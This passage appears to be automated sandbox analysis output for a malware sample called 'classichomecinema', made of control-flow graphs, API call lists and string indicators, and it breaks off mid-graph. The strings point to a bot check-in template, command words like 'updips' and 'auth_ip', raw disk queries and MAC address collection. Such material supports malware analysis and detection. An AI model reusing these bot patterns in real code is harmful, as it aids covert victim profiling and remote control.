call ab4100 238->242 243 ab67a6-ab67b4 238->243 242->243 243->191 245 ab67b6 call ab380b 243->245 245->191
                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.NTDLL(00AE4FD0), ref: 00AB5E8D
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00AB5EA4
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AB5EAD
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00AB5EBC
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AB5EBF
                                                                                        • GetTickCount.KERNEL32 ref: 00AB5ED3
                                                                                          • Part of subcall function 00AB59F4: _malloc.LIBCMT ref: 00AB5A02
                                                                                        • GetVersionExA.KERNEL32(00AE4E20), ref: 00AB5F00
                                                                                        • _malloc.LIBCMT ref: 00AB5F2C
                                                                                          • Part of subcall function 00AC1FAC: __FF_MSGBANNER.LIBCMT ref: 00AC1FC3
                                                                                          • Part of subcall function 00AC1FAC: __NMSG_WRITE.LIBCMT ref: 00AC1FCA
                                                                                          • Part of subcall function 00AC1FAC: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001), ref: 00AC1FEF
                                                                                        • _malloc.LIBCMT ref: 00AB5F3C
                                                                                        • _malloc.LIBCMT ref: 00AB5F47
                                                                                        • _malloc.LIBCMT ref: 00AB5F52
                                                                                        • _malloc.LIBCMT ref: 00AB5F5D
                                                                                        • _malloc.LIBCMT ref: 00AB5F68
                                                                                        • _malloc.LIBCMT ref: 00AB5F73
                                                                                        • _malloc.LIBCMT ref: 00AB5F7F
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00AB5F96
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00AB5F9F
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00AB5FAB
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00AB5FAE
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00AB5FB9
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00AB5FBC
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB5FF3
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB6000
                                                                                        • _malloc.LIBCMT ref: 00AB6021
                                                                                        • _malloc.LIBCMT ref: 00AB602F
                                                                                        • _malloc.LIBCMT ref: 00AB6036
                                                                                        • _malloc.LIBCMT ref: 00AB6057
                                                                                        • QueryPerformanceCounter.KERNEL32(00000200), ref: 00AB6063
                                                                                        • Sleep.KERNEL32(00000000), ref: 00AB6071
                                                                                        • _malloc.LIBCMT ref: 00AB607D
                                                                                        • _malloc.LIBCMT ref: 00AB608D
                                                                                        • Sleep.KERNEL32(0000EA60), ref: 00AB60FF
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB610A
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB611B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$]Np$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                        • API String ID: 4273019447-62021870
                                                                                        • Opcode ID: c522db2eb2f6a2424b093e59ad3dd5254e8937dc2fa667ac10941573a61ee6ea
                                                                                        • Instruction ID: c4b30fc6e6f281774afc993307d391dedb4a74e6affb9c8fc0cc22e1048a55db
                                                                                        • Opcode Fuzzy Hash: c522db2eb2f6a2424b093e59ad3dd5254e8937dc2fa667ac10941573a61ee6ea
                                                                                        • Instruction Fuzzy Hash: BD71C8B1D053809FD710EFB4AC59B5B7BE8AF89B00F05081EF18597292DBB84905CBD6

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1066 abe9a6-abe9c9 LoadLibraryA 1067 abea89-abea90 1066->1067 1068 abe9cf-abe9dd GetProcAddress 1066->1068 1069 abe9e3-abe9f3 1068->1069 1070 abea82-abea83 FreeLibrary 1068->1070 1071 abe9f5-abea01 GetAdaptersInfo 1069->1071 1070->1067 1072 abea39-abea41 1071->1072 1073 abea03 1071->1073 1075 abea4a-abea4f 1072->1075 1076 abea43-abea49 call ac26cf 1072->1076 1074 abea05-abea0c 1073->1074 1079 abea0e-abea12 1074->1079 1080 abea16-abea1e 1074->1080 1077 abea7d-abea81 1075->1077 1078 abea51-abea54 1075->1078 1076->1075 1077->1070 1078->1077 1083 abea56-abea5b 1078->1083 1079->1074 1084 abea14 1079->1084 1085 abea21-abea26 1080->1085 1086 abea68-abea73 call ac27b5 1083->1086 1087 abea5d-abea65 1083->1087 1084->1072 1085->1085 1088 abea28-abea35 call abe6f5 1085->1088 1086->1077 1093 abea75-abea78 1086->1093 1087->1086 1088->1072 1093->1071
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00ABE9BC
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00ABE9D5
                                                                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 00ABE9FA
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00ABEA83
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                        • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                        • API String ID: 514930453-3114217049
                                                                                        • Opcode ID: 3e373134c0409cf5bf1f0a31ebb89724f4db0ae960f9cb6827ad3aba61a6221e
                                                                                        • Instruction ID: f7407c85ebf3d8fc9d12753c8a6d849a838babd6788e18c7dc57bb29b0d70951
                                                                                        • Opcode Fuzzy Hash: 3e373134c0409cf5bf1f0a31ebb89724f4db0ae960f9cb6827ad3aba61a6221e
                                                                                        • Instruction Fuzzy Hash: 3D21A375A042099FDB10DFA8D884AEEBBFCFF45351F1441AEE505E7242DB309D458BA4

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1094 ab2b95-ab2baf 1095 ab2bb1-ab2bb9 call abfb10 1094->1095 1096 ab2bc7-ab2bcb 1094->1096 1104 ab2bbf-ab2bc2 1095->1104 1098 ab2bdf 1096->1098 1099 ab2bcd-ab2bd0 1096->1099 1100 ab2be2-ab2c11 WSASetLastError WSARecv call ab9505 1098->1100 1099->1098 1102 ab2bd2-ab2bdd call abfb10 1099->1102 1107 ab2c16-ab2c1d 1100->1107 1102->1104 1108 ab2d30 1104->1108 1109 ab2c1f-ab2c2a call abfb10 1107->1109 1110 ab2c2c-ab2c32 1107->1110 1111 ab2d32-ab2d38 1108->1111 1120 ab2c3f-ab2c42 1109->1120 1113 ab2c46-ab2c48 1110->1113 1114 ab2c34-ab2c39 call abfb10 1110->1114 1117 ab2c4a-ab2c4d 1113->1117 1118 ab2c4f-ab2c60 call abfb10 1113->1118 1114->1120 1122 ab2c66-ab2c69 1117->1122 1118->1111 1118->1122 1120->1113 1124 ab2c6b-ab2c6d 1122->1124 1125 ab2c73-ab2c76 1122->1125 1124->1125 1126 ab2d22-ab2d2d call ab1996 1124->1126 1125->1108 1127 ab2c7c-ab2c9a call abfb10 call ab166f 1125->1127 1126->1108 1134 ab2cbc-ab2cfa WSASetLastError select call ab9505 1127->1134 1135 ab2c9c-ab2cba call abfb10 call ab166f 1127->1135 1140 ab2d08 1134->1140 1141 ab2cfc-ab2d06 call abfb10 1134->1141 1135->1108 1135->1134 1144 ab2d0a-ab2d12 call abfb10 1140->1144 1145 ab2d15-ab2d17 1140->1145 1149 ab2d19-ab2d1d 1141->1149 1144->1145 1145->1108 1145->1149 1149->1100
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00AB2BE4
                                                                                        • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 00AB2C07
                                                                                          • Part of subcall function 00AB9505: WSAGetLastError.WS2_32(00000000,?,?,00AB2A51), ref: 00AB9513
                                                                                        • WSASetLastError.WS2_32 ref: 00AB2CD3
                                                                                        • select.WS2_32(?,?,00000000,00000000,00000000), ref: 00AB2CE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Recvselect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 886190287-280543908
                                                                                        • Opcode ID: 3966c879a4e00a89ae98cb7802a4e15b116a09d80a3e814b13228bffd320d64e
                                                                                        • Instruction ID: b4f8e52ab6eb2fa3f5797dab8d34a72233e4aab6902b02009b85e3b56526db17
                                                                                        • Opcode Fuzzy Hash: 3966c879a4e00a89ae98cb7802a4e15b116a09d80a3e814b13228bffd320d64e
                                                                                        • Instruction Fuzzy Hash: 24417DB1A153018FDB20DF64C9157EBBBECAF84354F144D2EF49587292EB70D9409B92

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1151 abe8a2-abe8cd CreateFileA 1152 abe99e-abe9a5 1151->1152 1153 abe8d3-abe8e8 1151->1153 1154 abe8eb-abe90d DeviceIoControl 1153->1154 1155 abe90f-abe917 1154->1155 1156 abe946-abe94e 1154->1156 1157 abe919-abe91e 1155->1157 1158 abe920-abe925 1155->1158 1159 abe950-abe956 call ac26cf 1156->1159 1160 abe957-abe959 1156->1160 1157->1156 1158->1156 1161 abe927-abe92f 1158->1161 1159->1160 1163 abe95b-abe95e 1160->1163 1164 abe994-abe99d CloseHandle 1160->1164 1165 abe932-abe937 1161->1165 1167 abe97a-abe987 call ac27b5 1163->1167 1168 abe960-abe969 GetLastError 1163->1168 1164->1152 1165->1165 1170 abe939-abe945 call abe6f5 1165->1170 1167->1164 1175 abe989-abe98f 1167->1175 1168->1164 1171 abe96b-abe96e 1168->1171 1170->1156 1171->1167 1172 abe970-abe977 1171->1172 1172->1167 1175->1154
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00ABE8C1
                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 00ABE8FF
                                                                                        • GetLastError.KERNEL32 ref: 00ABE960
                                                                                        • CloseHandle.KERNEL32(?), ref: 00ABE997
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                        • String ID: \\.\PhysicalDrive0
                                                                                        • API String ID: 4026078076-1180397377
                                                                                        • Opcode ID: 09a52af708d42fe6759761d6c4c99f4a7a577822bfbfe3dd696f12bad3721725
                                                                                        • Instruction ID: 806c629f9452087cb00c0c3dc52f2cb7ee386e0c26a05c043af6073f4a2383f1
                                                                                        • Opcode Fuzzy Hash: 09a52af708d42fe6759761d6c4c99f4a7a577822bfbfe3dd696f12bad3721725
                                                                                        • Instruction Fuzzy Hash: 72316E75E00219AFDB24DF94D884AEEBBB8FF45710F24416AE505A7282D7705E09CBE0
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(-C448D760), ref: 00B13978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE8000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ae8000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID: ^0s
                                                                                        • API String ID: 2962429428-4263405714
                                                                                        • Opcode ID: 1e84acf074a9bbbc6055d08f1e07e31911314f495d98b6f2567ac3587e3376ec
                                                                                        • Instruction ID: 2ffb568a22a7b7fafc9f4a700d16d760f0bc10830ab654d575b316ce46388bce
                                                                                        • Opcode Fuzzy Hash: 1e84acf074a9bbbc6055d08f1e07e31911314f495d98b6f2567ac3587e3376ec
                                                                                        • Instruction Fuzzy Hash: 2051C1F391C6109FE308AE29EC9577AB7E9EB88710F164A2DFAC9C7704D6315C408696
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(-C448D760), ref: 00B13978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE8000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ae8000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID: ^0s
                                                                                        • API String ID: 2962429428-4263405714
                                                                                        • Opcode ID: cf2c784872a2197bf033916813916896aecaa4c89dec95eeb82f5eed13489d62
                                                                                        • Instruction ID: 8b391d003676fa32c102e6f429a4db1e55054db3640474f8776f47af8f82153d
                                                                                        • Opcode Fuzzy Hash: cf2c784872a2197bf033916813916896aecaa4c89dec95eeb82f5eed13489d62
                                                                                        • Instruction Fuzzy Hash: D951C1F391C6109FE308AE29EC9577AB7E9EB88710F164A3DFAC9C7704D6315C408696

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 248 ab5dee-ab5dfc 249 ab5e03-ab5e16 248->249 249->249 250 ab5e18-ab5e1b 249->250 250->250 251 ab5e1d-ab5e33 250->251 252 ab5e9c-ab5ea6 251->252 253 ab5e35-ab5e38 251->253 254 ab5eab-ab60e7 GetProcAddress GetModuleHandleA GetProcAddress call ab42c7 GetTickCount call ab59f4 GetVersionExA call ac3750 call ac1fac * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call ac3750 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call ac1fac * 4 QueryPerformanceCounter Sleep call ac1fac * 2 call ac3750 * 2 252->254 253->254 255 ab5e3a-ab5e58 253->255 300 ab60eb-ab60ed 254->300 301 ab60ef-ab60f4 300->301 302 ab60f6-ab60f8 300->302 305 ab60ff Sleep 301->305 303 ab60fa 302->303 304 ab6105-ab6134 RtlEnterCriticalSection RtlLeaveCriticalSection 302->304 303->305 306 ab6289-ab62b7 304->306 305->304 308 ab62b9-ab62bd 306->308 309 ab632b-ab6331 308->309 310 ab62bf-ab62c3 308->310 311 ab6388-ab638b 309->311 312 ab6332 309->312 313 ab62c5 310->313 315 ab638e-ab638f 311->315 312->311 314 ab6334-ab633e 312->314 313->306 316 ab62c7-ab62c9 313->316 317 ab63b7-ab63c8 314->317 318 ab636b-ab6372 315->318 319 ab6391 315->319 320 ab62ce-ab62d8 316->320 321 ab63ca-ab63e0 317->321 322 ab63e7 317->322 323 ab63e1-ab63e4 318->323 324 ab6374-ab6383 318->324 325 ab6395-ab63a2 319->325 320->308 326 ab62da-ab6304 320->326 321->323 322->315 327 ab63e9-ab6443 322->327 323->322 328 ab635a 324->328 329 ab6385 324->329 325->325 330 ab63a4-ab63b2 325->330 326->320 334 ab6306-ab6315 326->334 332 ab645f-ab6469 327->332 333 ab6445-ab644b 327->333 329->311 330->317 332->300 337 ab646f-ab6493 call ac3750 call ab439c 332->337 335 ab644d-ab644f 333->335 336 ab6451-ab645e call ab534d 333->336 334->313 338 ab6317-ab6327 334->338 335->332 336->332 337->300 345 ab6499-ab64c4 RtlEnterCriticalSection RtlLeaveCriticalSection call ac133c 337->345 338->309 348 ab650e-ab6526 call ac133c 345->348 349 ab64c6-ab64d5 call ac133c 345->349 354 ab67cd-ab67dc call ac133c 348->354 355 ab652c-ab652e 348->355 349->348 356 ab64d7-ab64e6 call ac133c 349->356 363 ab67de-ab67e0 354->363 364 ab6821-ab6830 call ac133c 354->364 355->354 358 ab6534-ab65df call ac1fac RtlEnterCriticalSection RtlLeaveCriticalSection call ac3750 * 5 call ab439c * 2 355->358 356->348 366 ab64e8-ab64f7 call ac133c 356->366 408 ab661c 358->408 409 ab65e1-ab65e3 358->409 363->364 367 ab67e2-ab681c call ac3750 RtlEnterCriticalSection RtlLeaveCriticalSection 363->367 377 ab6832-ab6840 call ab5c0c call ab5d1a 364->377 378 ab6845-ab6854 call ac133c 364->378 366->348 379 ab64f9-ab6508 call ac133c 366->379 367->300 377->300 378->300 388 ab685a-ab685c 378->388 379->300 379->348 388->300 391 ab6862-ab687b call ab439c 388->391 391->300 398 ab6881-ab6950 call ac1418 call ab1ba7 391->398 410 ab6952 call ab143f 398->410 411 ab6957-ab6978 RtlEnterCriticalSection 398->411 413 ab6620-ab664e call ac1fac call ac3750 call ab439c 408->413 409->408 412 ab65e5-ab65f7 call ac133c 409->412 410->411 415 ab697a-ab6981 411->415 416 ab6984-ab69eb RtlLeaveCriticalSection call ab3c67 call ab3d7e call ab7336 411->416 412->408 424 ab65f9-ab661a call ab439c 412->424 434 ab668f-ab6698 call ac1f74 413->434 435 ab6650-ab665f call ac25e6 413->435 415->416 436 ab6b53-ab6b67 call ab7fff 416->436 437 ab69f1-ab6a33 call ab9721 416->437 424->413 446 ab67bb-ab67c8 434->446 447 ab669e-ab66b6 call ac27b5 434->447 435->434 448 ab6661 435->448 436->300 449 ab6a39-ab6a40 437->449 450 ab6b1d-ab6b4e call ab73e5 call ab33b2 437->450 446->300 459 ab66b8-ab66c0 call ab8733 447->459 460 ab66c2 447->460 452 ab6666-ab6678 call ac1850 448->452 454 ab6a43-ab6a48 449->454 450->436 466 ab667a 452->466 467 ab667d-ab668d call ac25e6 452->467 454->454 458 ab6a4a-ab6a8f call ab9721 454->458 458->450 472 ab6a95-ab6a9b 458->472 465 ab66c4-ab6768 call ab984b call ab3863 call ab5119 call ab3863 call ab9af1 call ab9c0b 459->465 460->465 492 ab676a call ab380b 465->492 493 ab676f-ab679a Sleep call ac08f0 465->493 466->467 467->434 467->452 473 ab6a9e-ab6aa3 472->473 473->473 476 ab6aa5-ab6ae0 call ab9721 473->476 476->450 482 ab6ae2-ab6b1c call abc113 476->482 482->450 492->493 497 ab679c-ab67a5 call ab4100 493->497 498 ab67a6-ab67b4 493->498 497->498 498->446 500 ab67b6 call ab380b 498->500 500->446
                                                                                        Strings
                                                                                        • ]Np, xrefs: 00AB5ED9
                                                                                        • strcat, xrefs: 00AB5EAF
                                                                                        • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 00AB6124
                                                                                        • gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d, xrefs: 00AB603E
                                                                                        • ntdll.dll, xrefs: 00AB5EB4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$]Np$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$strcat
                                                                                        • API String ID: 0-112600469
                                                                                        • Opcode ID: c9382f7515c6b277282ae0b37377d27ec2f4876ee3afd0c579bbac68f7908876
                                                                                        • Instruction ID: 74780cc4503afe5c8e1d25ac41a7ba4ab3e9faded3ca3b77c9e67dc287a1a7c7
                                                                                        • Opcode Fuzzy Hash: c9382f7515c6b277282ae0b37377d27ec2f4876ee3afd0c579bbac68f7908876
                                                                                        • Instruction Fuzzy Hash: 34811571D097805FC710EF74AC5AB9B7BE8AF8A710F15081EF1849B292C7B44506CBD6

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 503 ab62a7-ab62b7 504 ab62b9-ab62bd 503->504 505 ab632b-ab6331 504->505 506 ab62bf-ab62c3 504->506 507 ab6388-ab638b 505->507 508 ab6332 505->508 509 ab62c5 506->509 511 ab638e-ab638f 507->511 508->507 510 ab6334-ab633e 508->510 512 ab6289-ab62a3 509->512 513 ab62c7-ab62c9 509->513 514 ab63b7-ab63c8 510->514 515 ab636b-ab6372 511->515 516 ab6391 511->516 512->503 517 ab62ce-ab62d8 513->517 518 ab63ca-ab63e0 514->518 519 ab63e7 514->519 520 ab63e1-ab63e4 515->520 521 ab6374-ab6383 515->521 522 ab6395-ab63a2 516->522 517->504 523 ab62da-ab6304 517->523 518->520 519->511 524 ab63e9-ab6443 519->524 520->519 525 ab635a 521->525 526 ab6385 521->526 522->522 527 ab63a4-ab63b2 522->527 523->517 531 ab6306-ab6315 523->531 529 ab645f-ab6469 524->529 530 ab6445-ab644b 524->530 526->507 527->514 534 ab60eb-ab60ed 529->534 535 ab646f-ab6493 call ac3750 call ab439c 529->535 532 ab644d-ab644f 530->532 533 ab6451-ab645e call ab534d 530->533 531->509 536 ab6317-ab6327 531->536 532->529 533->529 537 ab60ef-ab60f4 534->537 538 ab60f6-ab60f8 534->538 535->534 548 ab6499-ab64c4 RtlEnterCriticalSection RtlLeaveCriticalSection call ac133c 535->548 536->505 543 ab60ff Sleep 537->543 541 ab60fa 538->541 542 ab6105-ab6134 RtlEnterCriticalSection RtlLeaveCriticalSection 538->542 541->543 542->512 543->542 551 ab650e-ab6526 call ac133c 548->551 552 ab64c6-ab64d5 call ac133c 548->552 557 ab67cd-ab67dc call ac133c 551->557 558 ab652c-ab652e 551->558 552->551 559 ab64d7-ab64e6 call ac133c 552->559 566 ab67de-ab67e0 557->566 567 ab6821-ab6830 call ac133c 557->567 558->557 561 ab6534-ab65df call ac1fac RtlEnterCriticalSection RtlLeaveCriticalSection call ac3750 * 5 call ab439c * 2 558->561 559->551 569 ab64e8-ab64f7 call ac133c 559->569 611 ab661c 561->611 612 ab65e1-ab65e3 561->612 566->567 570 ab67e2-ab681c call ac3750 RtlEnterCriticalSection RtlLeaveCriticalSection 566->570 580 ab6832-ab6840 call ab5c0c call ab5d1a 567->580 581 ab6845-ab6854 call ac133c 567->581 569->551 582 ab64f9-ab6508 call ac133c 569->582 570->534 580->534 581->534 591 ab685a-ab685c 581->591 582->534 582->551 591->534 594 ab6862-ab687b call ab439c 591->594 594->534 601 ab6881-ab6950 call ac1418 call ab1ba7 594->601 613 ab6952 call ab143f 601->613 614 ab6957-ab6978 RtlEnterCriticalSection 601->614 616 ab6620-ab664e call ac1fac call ac3750 call ab439c 611->616 612->611 615 ab65e5-ab65f7 call ac133c 612->615 613->614 618 ab697a-ab6981 614->618 619 ab6984-ab69eb RtlLeaveCriticalSection call ab3c67 call ab3d7e call ab7336 614->619 615->611 627 ab65f9-ab661a call ab439c 615->627 637 ab668f-ab6698 call ac1f74 616->637 638 ab6650-ab665f call ac25e6 616->638 618->619 639 ab6b53-ab6b67 call ab7fff 619->639 640 ab69f1-ab6a33 call ab9721 619->640 627->616 649 ab67bb-ab67c8 637->649 650 ab669e-ab66b6 call ac27b5 637->650 638->637 651 ab6661 638->651 639->534 652 ab6a39-ab6a40 640->652 653 ab6b1d-ab6b4e call ab73e5 call ab33b2 640->653 649->534 662 ab66b8-ab66c0 call ab8733 650->662 663 ab66c2 650->663 655 ab6666-ab6678 call ac1850 651->655 657 ab6a43-ab6a48 652->657 653->639 669 ab667a 655->669 670 ab667d-ab668d call ac25e6 655->670 657->657 661 ab6a4a-ab6a8f call ab9721 657->661 661->653 675 ab6a95-ab6a9b 661->675 668 ab66c4-ab6768 call ab984b call ab3863 call ab5119 call ab3863 call ab9af1 call ab9c0b 662->668 663->668 695 ab676a call ab380b 668->695 696 ab676f-ab679a Sleep call ac08f0 668->696 669->670 670->637 670->655 676 ab6a9e-ab6aa3 675->676 676->676 679 ab6aa5-ab6ae0 call ab9721 676->679 679->653 685 ab6ae2-ab6b1c call abc113 679->685 685->653 695->696 700 ab679c-ab67a5 call ab4100 696->700 701 ab67a6-ab67b4 696->701 700->701 701->649 703 ab67b6 call ab380b 701->703 703->649
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.NTDLL(00AE4FD0), ref: 00AB649E
                                                                                        • RtlLeaveCriticalSection.NTDLL(00AE4FD0), ref: 00AB64AF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                        • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                        • API String ID: 3168844106-2823103634
                                                                                        • Opcode ID: 12e51174fc1a69f626fda0ee4f42db25a07db5709400653381def2a48c7ba7e2
                                                                                        • Instruction ID: 18f5c07251599cf608ae01b68352b209610d713071f4a081746e48f6993cf979
                                                                                        • Opcode Fuzzy Hash: 12e51174fc1a69f626fda0ee4f42db25a07db5709400653381def2a48c7ba7e2
                                                                                        • Instruction Fuzzy Hash: B43254326083819FC724DB34D952BEFBBE8AF86714F14491EF48A8B293DB349405CB52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 706 ab6364-ab6372 707 ab63e1-ab63e4 706->707 708 ab6374-ab6383 706->708 709 ab63e7 707->709 710 ab635a 708->710 711 ab6385 708->711 712 ab63e9-ab6443 709->712 713 ab638e-ab638f 709->713 714 ab6388-ab638b 711->714 715 ab645f-ab6469 712->715 716 ab6445-ab644b 712->716 717 ab636b-ab6372 713->717 718 ab6391 713->718 714->713 721 ab60eb-ab60ed 715->721 722 ab646f-ab6493 call ac3750 call ab439c 715->722 719 ab644d-ab644f 716->719 720 ab6451-ab645e call ab534d 716->720 717->707 717->708 723 ab6395-ab63a2 718->723 719->715 720->715 724 ab60ef-ab60f4 721->724 725 ab60f6-ab60f8 721->725 722->721 740 ab6499-ab64c4 RtlEnterCriticalSection RtlLeaveCriticalSection call ac133c 722->740 723->723 728 ab63a4-ab63b2 723->728 732 ab60ff Sleep 724->732 730 ab60fa 725->730 731 ab6105-ab6134 RtlEnterCriticalSection RtlLeaveCriticalSection 725->731 729 ab63b7-ab63c8 728->729 729->709 735 ab63ca-ab63e0 729->735 730->732 736 ab6289-ab62b7 731->736 732->731 735->707 741 ab62b9-ab62bd 736->741 748 ab650e-ab6526 call ac133c 740->748 749 ab64c6-ab64d5 call ac133c 740->749 743 ab632b-ab6331 741->743 744 ab62bf-ab62c3 741->744 743->714 746 ab6332 743->746 747 ab62c5 744->747 746->714 750 ab6334-ab633e 746->750 747->736 751 ab62c7-ab62c9 747->751 758 ab67cd-ab67dc call ac133c 748->758 759 ab652c-ab652e 748->759 749->748 760 ab64d7-ab64e6 call ac133c 749->760 750->729 754 ab62ce-ab62d8 751->754 754->741 757 ab62da-ab6304 754->757 757->754 765 ab6306-ab6315 757->765 770 ab67de-ab67e0 758->770 771 ab6821-ab6830 call ac133c 758->771 759->758 763 ab6534-ab65df call ac1fac RtlEnterCriticalSection RtlLeaveCriticalSection call ac3750 * 5 call ab439c * 2 759->763 760->748 773 ab64e8-ab64f7 call ac133c 760->773 815 ab661c 763->815 816 ab65e1-ab65e3 763->816 765->747 769 ab6317-ab6327 765->769 769->743 770->771 774 ab67e2-ab681c call ac3750 RtlEnterCriticalSection RtlLeaveCriticalSection 770->774 784 ab6832-ab6840 call ab5c0c call ab5d1a 771->784 785 ab6845-ab6854 call ac133c 771->785 773->748 786 ab64f9-ab6508 call ac133c 773->786 774->721 784->721 785->721 795 ab685a-ab685c 785->795 786->721 786->748 795->721 798 ab6862-ab687b call ab439c 795->798 798->721 805 ab6881-ab6950 call ac1418 call ab1ba7 798->805 817 ab6952 call ab143f 805->817 818 ab6957-ab6978 RtlEnterCriticalSection 805->818 820 ab6620-ab664e call ac1fac call ac3750 call ab439c 815->820 816->815 819 ab65e5-ab65f7 call ac133c 816->819 817->818 822 ab697a-ab6981 818->822 823 ab6984-ab69eb RtlLeaveCriticalSection call ab3c67 call 